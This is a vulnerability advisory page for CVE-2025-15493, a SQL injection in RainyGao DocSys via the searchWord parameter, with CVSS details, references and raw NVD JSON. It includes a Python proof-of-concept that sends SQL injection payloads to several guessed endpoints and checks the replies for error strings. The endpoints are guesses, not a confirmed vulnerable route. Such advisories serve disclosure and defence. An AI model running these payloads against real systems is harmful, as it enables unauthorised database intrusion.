CVE-2025-15493

Description

A flaw has been found in RainyGao DocSys up to 2.02.36. The impacted element is an unknown function of the file src/com/DocSystem/mapping/ReposAuthMapper.xml. Executing a manipulation of the argument searchWord can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:docsys_project:docsys:*:*:*:*:*:*:*:* - VULNERABLE

RainyGao DocSys <= 2.02.36

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15493 SQL Injection PoC for RainyGao DocSys
# Target: RainyGao DocSys <= 2.02.36
# Parameter: searchWord
# File: src/com/DocSystem/mapping/ReposAuthMapper.xml

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in searchWord parameter
    """
    # Common endpoint patterns for DocSys search functionality
    endpoints = [
        "/repos/search",
        "/api/repos/search",
        "/search",
        "/api/search",
        "/reposAuth/search"
    ]
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        params = {
            'searchWord': payload
        }
        
        try:
            response = requests.get(url, params=params, timeout=10)
            print(f"[*] Testing endpoint: {url}")
            print(f"[*] Status code: {response.status_code}")
            
            # Check for SQL error indicators
            if any(err in response.text.lower() for err in ['sql', 'syntax', 'error', 'mysql', 'oracle']):
                print(f"[+] Potential SQL injection detected!")
                print(f"[+] Response snippet: {response.text[:500]}")
                return True
        except requests.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")
    
    return False

# Test payloads
test_payloads = [
    "' OR '1'='1",
    "' UNION SELECT NULL--",
    "admin'--",
    "1' AND SLEEP(5)--"
]

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15493.py <target_url>")
        print("Example: python cve-2025-15493.py http://target.com")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Starting CVE-2025-15493 exploitation...")
    print(f"[*] Target: {target}")
    
    for payload in test_payloads:
        print(f"\n[*] Testing payload: {payload}")
        if exploit_sqli(target, payload):
            print(f"[+] Vulnerable to: {payload}")
            break

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15493
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15493
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15493/
[4] VulDB https://vuldb.com/cve/CVE-2025-15493
[5] https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/sql%E6%B3%A8%E5%85%A52.md
[6] https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/sql%E6%B3%A8%E5%85%A52.md#vulnerability-analysis-and-reproduction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0
[7] https://vuldb.com/?ctiid.340271
[8] https://vuldb.com/?id.340271
[9] https://vuldb.com/?submit.725374
[10] https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/sql%E6%B3%A8%E5%85%A52.md
[11] https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/sql%E6%B3%A8%E5%85%A52.md#vulnerability-analysis-and-reproduction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15493", "sourceIdentifier": "[email protected]", "published": "2026-01-09T17:15:51.987", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in RainyGao DocSys up to 2.02.36. The impacted element is an unknown function of the file src/com/DocSystem/mapping/ReposAuthMapper.xml. Executing a manipulation of the argument searchWord can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en RainyGao DocSys hasta la versión 2.02.36. El elemento afectado es una función desconocida del archivo src/com/DocSystem/mapping/ReposAuthMapper.xml. La ejecución de una manipulación del argumento searchWord puede conducir a una inyección SQL. Es posible lanzar el ataque remotamente. El exploit ha sido publicado y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:docsys_project:docsys:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.02.36", "matchCriteriaId": "4B914AE0-E759-4F59-A694-2A556E6B939F"}]}]}], "references": [{"url": "https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/sql%E6%B3%A8%E5%85%A52.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/sql%E6%B3%A8%E5%85%A52.md#vulnerab ... (truncated)